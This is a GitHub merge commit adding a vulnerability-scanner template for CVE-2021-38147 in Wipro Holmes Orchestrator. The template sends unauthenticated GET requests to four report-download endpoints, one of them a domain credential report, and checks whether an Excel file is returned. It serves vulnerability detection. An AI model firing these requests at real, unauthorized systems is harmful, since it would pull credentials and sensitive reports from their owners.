Merge pull request #9995 from Kazgangap/wipro-excel

add CVE-2021-38147
patch-4
Ritik Chaddha 2024-06-11 17:14:57 +05:30 committed by GitHub
commit 2ec7ed5034
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 45 additions and 0 deletions

View File

@ -0,0 +1,45 @@
id: CVE-2021-38147
info:
name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
author: securityforeveryone
severity: high
description: |
Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
remediation: |
Fixed In v21.4.0
reference:
- https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-38147
- https://www.wipro.com/holmes/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-38147
cwe-id: CWE-306
epss-score: 0.00497
epss-percentile: 0.76242
cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: wipro
product: holmes
fofa-query: title="Holmes Orchestrator"
tags: cve,cve2021,wipro,holmes,orchestrator
http:
- method: GET
path:
- "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel"
- "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel"
- "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
- "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')"
- "contains(body, '<?xml version=')"
- "status_code == 200"
condition: and